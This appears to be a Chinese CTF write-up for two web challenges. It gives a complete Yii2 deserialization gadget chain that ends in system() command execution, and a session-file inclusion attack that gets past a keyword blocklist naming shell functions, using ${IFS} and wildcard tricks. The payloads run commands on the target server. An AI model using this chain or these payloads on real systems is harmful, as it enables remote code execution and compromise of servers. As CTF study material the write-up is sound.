部分web，太菜了有些做不出来

ezyii

参考：https://xz.aliyun.com/t/9948
不过后来第四条链子被作者删了。

代码如下：

<?php
namespace Codeception\Extension{
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
        protected $output;
        private $processes = [];
        public function __construct(){
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker{
    class DefaultGenerator
{
    protected $default;

    public function __construct($default = null)
    {
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
    use Faker\DefaultGenerator;
    final class AppendStream{
        private $streams = [];
        private $seekable = true;
        public function __construct(){
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
        private $remoteStream;
        public function __construct(){
            $this->remoteStream=new DefaultGenerator(false);
            $this->stream=new  PumpStream();
        }
    }
    final class PumpStream{
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
            $this->buffer=new DefaultGenerator('j');
            include("closure/autoload.php");
            $a = function(){system('cat /flag.txt');};
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}

安全检测

通过POST请求发现报错，代码中使用file_get_contents，

第一时间想到了利用伪协议读取，试了好多个，发现不是被禁用了就是不行

1	POST /check2.php HTTP/1.1
2	Host: eci-2zefzyj8kapkgt0oad3m.cloudeci1.ichunqiu.com
3
4	url1=http://ss123.828.22.1/

后面进行目录扫描，发现存在admin文件夹，尝试访问admin文件夹，payload：http://127.0.0.1/admin/

继续访问include123.php：http://127.0.0.1/admin/include123.php

<?php
$u=$_GET['u'];

$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
$pattern .="|file|dict|gopher";
//累了累了，饮茶先

$vpattern = explode("|",$pattern);

foreach($vpattern as $value){    
    if (preg_match( "/$value/i", $u )){
        echo "检测到恶意字符";
        exit(0);
    }
}

include($u);


show_source(__FILE__);
?>

测试了好多个都不行，查看了下session文件包含漏洞,应该是这个。

常见的php-session存放位置：
/var/lib/php/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

执行下phpinfo成功。

1	payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=phpinfo();?>
2	<?="xx"?>为PHP短标签，同等与<?php echo "xxx" ?>

执行lS试试，这边利用了${IFS}代替了空格

1	payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('ls${IFS}/');?>

1	bin boot dev etc getflag.sh home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var var

发现根目录下存在getflag.sh，运行下试试，由于flag被过滤，所以这边利用fl?g来代替flag

1	payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('.${IFS}/getfl?g.sh');?>

参考

一篇文章带你理解漏洞之 PHP 文件包含漏洞
 文件包含漏洞
 yii 2.0.42 最新反序列化利用全集
 [祥云杯2021] wp

1	<?php
2	namespace Codeception\Extension{
3	use Faker\DefaultGenerator;
4	use GuzzleHttp\Psr7\AppendStream;
5	class RunProcess{
6	protected $output;
7	private $processes = [];
8	public function __construct(){
9	$this->processes[]=new DefaultGenerator(new AppendStream());
10	$this->output=new DefaultGenerator('jiang');
11	}
12	}
13	echo base64_encode(serialize(new RunProcess()));
14	}
15
16	namespace Faker{
17	class DefaultGenerator
18	{
19	protected $default;
20
21	public function __construct($default = null)
22	{
23	$this->default = $default;
24	}
25	}
26	}
27	namespace GuzzleHttp\Psr7{
28	use Faker\DefaultGenerator;
29	final class AppendStream{
30	private $streams = [];
31	private $seekable = true;
32	public function __construct(){
33	$this->streams[]=new CachingStream();
34	}
35	}
36	final class CachingStream{
37	private $remoteStream;
38	public function __construct(){
39	$this->remoteStream=new DefaultGenerator(false);
40	$this->stream=new PumpStream();
41	}
42	}
43	final class PumpStream{
44	private $source;
45	private $size=-10;
46	private $buffer;
47	public function __construct(){
48	$this->buffer=new DefaultGenerator('j');
49	include("closure/autoload.php");
50	$a = function(){system('cat /flag.txt');};
51	$a = \Opis\Closure\serialize($a);
52	$b = unserialize($a);
53	$this->source=$b;
54	}
55	}
56	}

1	<?php
2	$u=$_GET['u'];
3
4	$pattern = "\/\\|\\|\.\.\/\|\.\/\|load_file\|outfile\|dumpfile\|sub\|hex\|where";
5	$pattern .= "\|file_put_content\|file_get_content\|fwrite\|curl\|system\|eval\|assert";
6	$pattern .="\|passthru\|exec\|system\|chroot\|scandir\|chgrp\|chown\|shell_exec\|proc_open\|proc_get_status\|popen\|ini_alter\|ini_restore";
7	$pattern .="\|`\|openlog\|syslog\|readlink\|symlink\|popepassthru\|stream_socket_server\|assert\|pcntl_exec\|http\|.php\|.ph\|.log\|\@\|:\/\/\|flag\|access\|error\|stdout\|stderr";
8	$pattern .="\|file\|dict\|gopher";
9	//累了累了，饮茶先
10
11	$vpattern = explode("\|",$pattern);
12
13	foreach($vpattern as $value){
14	if (preg_match( "/$value/i", $u )){
15	echo "检测到恶意字符";
16	exit(0);
17	}
18	}
19
20	include($u);
21
22
23	show_source(__FILE__);
24	?>

1	常见的php-session存放位置：
2	/var/lib/php/sess_PHPSESSID
3	/var/lib/php/sess_PHPSESSID
4	/tmp/sess_PHPSESSID
5	/tmp/sessions/sess_PHPSESSID